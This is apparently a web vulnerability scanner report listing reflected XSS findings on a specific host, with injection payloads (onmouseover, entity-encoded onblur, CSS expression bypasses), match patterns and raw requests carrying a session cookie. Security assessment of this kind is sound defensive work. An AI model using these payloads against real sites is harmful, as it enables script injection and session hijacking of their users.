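Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17/p2.html;'%20onmouseover=%22dfbhmg(6675)%22%3e%20var=%20
2. Set parameter '%20onmouseover=%22dfbhmg(6675)%22%3e%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6675)
Request & response GET /index.php/article/c17/p2.html;'%20onmouseover=%22dfbhmg(6675)%22%3e%20var=%20 HTTP/1.1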
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.html

URL http://202.201.39.48/index.php/article/c17/p2.html
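Request method GET
Affected parameter
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17/p2.html'%20style=dfbhmg:expre/**/ssion(dfbhmg(6212))%20var=%20
2. Set parameter '%20style=dfbhmg:expre/**/ssion(dfbhmg(6212))%20var=%20
3. Match in the response headers and response body: style.*?dfbhmg:expre/**/ssion(dfbhmg(6212))
Request & response GET /index.php/article/c17/p2.html'%20style=dfbhmg:expre/**/ssion(dfbhmg(6212))%20var=%20 HTTP/1.1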
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.html

URL http://202.201.39.48/index.php/article/19.mhtml
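Request method GET
Affected parameter value0
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/19'%20onmouseover=dfbhmg(6152)%20.mhtml
2. Set parameter value0'%20onmouseover=dfbhmg(6152)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6152)
Request & response GET /index.php/article/19'%20onmouseover=dfbhmg(6152)%20.mhtml HTTP/1.1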
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/19.html

URL http://202.201.39.48/index.php/article/c23.mhtml
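Request method GET
Affected parameter
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c23.mhtml?'%20onmouseover=dfbhmg(6700)%20
2. Set parameter '%20onmouseover=dfbhmg(6700)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6700)
Request & response GET /index.php/article/c23.mhtml?'%20onmouseover=dfbhmg(6700)%20 HTTP/1.1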
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c23.html

URL http://202.201.39.48/index.php/article/c23.mhtml
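Request method GET
Affected parameter var
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c23.mhtml?var='%20onmouseover=dfbhmg(6193)%20var=%20
2. Set parameter var'%20onmouseover=dfbhmg(6193)%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6193)
Request & response GET /index.php/article/c23.mhtml?var='%20onmouseover=dfbhmg(6193)%20var=%20 HTTP/1.1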
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c23.html

URL http://202.201.39.48/index.php/search-index-atestu-1.html
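Request method GET
Affected parameter value0
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/search-index-atestu-"%20onmouseover=%22dfbhmg(6359)%22%3e%20.html
2. Set parameter value0"%20onmouseover=%22dfbhmg(6359)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6359)
Request & response GET /index.php/search-index-atestu-"%20onmouseover=%22dfbhmg(6359)%22%3e%20.html HTTP/1.1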
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/search-index-atestu-1.mhtml

URL http://202.201.39.48/index.php/article/c37/p2.mhtml
Request method GET
Affected parameter
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37/p2.mhtml?'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x30;%26%23x35;%26%23x32;%26%23x29;%20
2. Set parameter '%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x30;%26%23x35;%26%23x32;%26%23x29;%20
3. Match in the response headers and response body: onblur.*?dfbhmg(6052)
Request & response GET /index.php/article/c37/p2.mhtml?'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x30;%26%23x35;%26%23x32;%26%23x29;%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.mhtml

URL http://202.201.39.48/index.php/article/c37/p2.mhtml
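Request method GET
Affected parameter var
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37/p2.mhtml?var='%20onmouseover=dfbhmg(6111)%20
2. Set parameter var'%20onmouseover=dfbhmg(6111)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6111)
Request & response GET /index.php/article/c37/p2.mhtml?var='%20onmouseover=dfbhmg(6111)%20 HTTP/1.1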
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.mhtml

URL http://202.201.39.48/index.php/article/c37/p2.mhtml
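Request method GET
Affected parameter
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37/p2.mhtml/'%20onmouseover=%22dfbhmg(6880)%22%3e%20
2. Set parameter '%20onmouseover=%22dfbhmg(6880)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6880)
Request & response GET /index.php/article/c37/p2.mhtml/'%20onmouseover=%22dfbhmg(6880)%22%3e%20 HTTP/1.1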
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.mhtml

URL http://202.201.39.48/index.php/article/c37/p2.mhtml
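Request method GET
Affected parameter
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37/p2.mhtml;'%20onmouseover=%22dfbhmg(6407)%22%3e%20
2. Set parameter '%20onmouseover=%22dfbhmg(6407)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6407)
Request & response GET /index.php/article/c37/p2.mhtml;'%20onmouseover=%22dfbhmg(6407)%22%3e%20 HTTP/1.1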
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.mhtml

URL http://202.201.39.48/index.php/article/c37/p2.mhtml
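Request method GET
Affected parameter
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37/p2.mhtml'%20onmouseover=dfbhmg(6567)%20
2. Set parameter '%20onmouseover=dfbhmg(6567)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6567)
Request & response GET /index.php/article/c37/p2.mhtml'%20onmouseover=dfbhmg(6567)%20 HTTP/1.1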
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.mhtml

URL http://202.201.39.48/index.php/message-comment-article-26.mhtml
Request method GET
Affected parameter value0
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/message-comment-article-'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x38;%26%23x37;%26%23x32;%26%23x29;%20.mhtml
2. Set parameter value0'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x38;%26%23x37;%26%23x32;%26%23x29;%20
3. Match in the response headers and response body: onblur.*?dfbhmg(6872)
Request & response GET /index.php/message-comment-article-'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x38;%26%23x37;%26%23x32;%26%23x29;%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/26.mhtml

URL http://202.201.39.48/index.php/page/18.mhtml
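Request method GET
Affected parameter value0
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/page/"%20onmouseover=dfbhmg(6949)%20var=%20.mhtml
2. Set parameter value0"%20onmouseover=dfbhmg(6949)%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6949)
Request & response GET /index.php/page/"%20onmouseover=dfbhmg(6949)%20var=%20.mhtml HTTP/1.1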
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/sitemap.xml

URL http://202.201.39.48/index.php/article/37.mhtml
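Request method GET
Affected parameter value0
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/37'%20onmouseover=dfbhmg(6271)%20.mhtml
2. Set parameter value0'%20onmouseover=dfbhmg(6271)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6271)
Request & response GET /index.php/article/37'%20onmouseover=dfbhmg(6271)%20.mhtml HTTP/1.1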
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/sitemap.xml

URL http://202.201.39.48/index.php/article/22.mhtml
Request method GET
Affected parameter value0
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/22'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x31;%26%23x32;%26%23x36;%26%23x29;%20.mhtml
2. Set parameter value0'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x31;%26%23x32;%26%23x36;%26%23x29;%20
3. Match in the response headers and response body: onblur.*?dfbhmg(6126)
Request & response GET /index.php/article/22'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x31;%26%23x32;%26%23x36;%26%23x29;%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/sitemap.xml

URL http://202.201.39.48/index.php/message-comment-article-27.mhtml
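Request method GET
Affected parameter value0
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=%22dfbhmg(6585)%22%3e%20var=%20.mhtml
2. Set parameter value0'%20onmouseover=%22dfbhmg(6585)%22%3e%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6585)
Request & response GET /index.php/message-comment-article-'%20onmouseover=%22dfbhmg(6585)%22%3e%20var=%20.mhtml HTTP/1.1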
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/27.mhtml

URL http://202.201.39.48/index.php/message-comment-article-20.mhtml
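Request method GET
Affected parameter value0
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6663)%20.mhtml
2. Set parameter value0'%20onmouseover=dfbhmg(6663)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6663)
Request & response GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6663)%20.mhtml HTTP/1.1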
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/20.mhtml

URL http://202.201.39.48/index.php/message-comment-article-36.mhtml
Request method GET
Affected parameter value0
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/message-comment-article-'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x34;%26%23x37;%26%23x31;%26%23x29;%20.mhtml
2. Set parameter value0'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x34;%26%23x37;%26%23x31;%26%23x29;%20
3. Match in the response headers and response body: onblur.*?dfbhmg(6471)
Request & response GET /index.php/message-comment-article-'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x34;%26%23x37;%26%23x31;%26%23x29;%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/36.mhtml

URL http://202.201.39.48/index.php/message-comment-article-24.mhtml
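Request method GET
Affected parameter value0
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6172)%20var=%20.mhtml
2. Set parameter value0'%20onmouseover=dfbhmg(6172)%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6172)
Request & response GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6172)%20var=%20.mhtml HTTP/1.1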
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/24.mhtml

URL http://202.201.39.48/index.php/user-deny-product-browse-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.html
Request method GET
Affected parameter value0
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/user-deny-product-"%20onmouseover=dfbhmg(6053)%20var=%20-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.html
2. Set parameter value0"%20onmouseover=dfbhmg(6053)%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6053)
Request & response GET /index.php/user-deny-product-"%20onmouseover=dfbhmg(6053)%20var=%20-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.html HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/product/c7.html

URL http://202.201.39.48/index.php/user-deny-product-browse-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.html
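Request method GET
Affected parameter value1
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/user-deny-product-browse-"%20onmouseover=dfbhmg(6387)%20var=%20.html
2. Set parameter value1"%20onmouseover=dfbhmg(6387)%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6387)
Request & response GET /index.php/user-deny-product-browse-"%20onmouseover=dfbhmg(6387)%20var=%20.html HTTP/1.1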
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/product/c7.html

URL http://202.201.39.48/index.php/article/c17/p2.mhtml
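Request method GET
Affected parameter
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17/p2.mhtml?'%20onmouseover=dfbhmg(6489)%20var=%20
2. Set parameter '%20onmouseover=dfbhmg(6489)%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6489)
Request & response GET /index.php/article/c17/p2.mhtml?'%20onmouseover=dfbhmg(6489)%20var=%20 HTTP/1.1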
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.mhtml

URL http://202.201.39.48/index.php/article/c17/p2.mhtml
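Request method GET
Affected parameter var
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17/p2.mhtml?var='%20onmouseover=dfbhmg(6886)%20
2. Set parameter var'%20onmouseover=dfbhmg(6886)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6886)
Request & response GET /index.php/article/c17/p2.mhtml?var='%20onmouseover=dfbhmg(6886)%20 HTTP/1.1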
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.mhtml

URL http://202.201.39.48/index.php/article/c17/p2.mhtml
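Request method GET
Affected parameter
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17/p2.mhtml/'%20onmouseover=%22dfbhmg(6724)%22%3e%20var=%20
2. Set parameter '%20onmouseover=%22dfbhmg(6724)%22%3e%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6724)
Request & response GET /index.php/article/c17/p2.mhtml/'%20onmouseover=%22dfbhmg(6724)%22%3e%20var=%20 HTTP/1.1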
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.mhtml

URL http://202.201.39.48/index.php/article/c17/p2.mhtml
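Request method GET
Affected parameter
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17/p2.mhtml;'%20onmouseover=%22dfbhmg(6065)%22%3e%20var=%20
2. Set parameter '%20onmouseover=%22dfbhmg(6065)%22%3e%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6065)
Request & response GET /index.php/article/c17/p2.mhtml;'%20onmouseover=%22dfbhmg(6065)%22%3e%20var=%20 HTTP/1.1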
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.mhtml

URL http://202.201.39.48/index.php/article/c17/p2.mhtml
Request method GET
Affected parameter
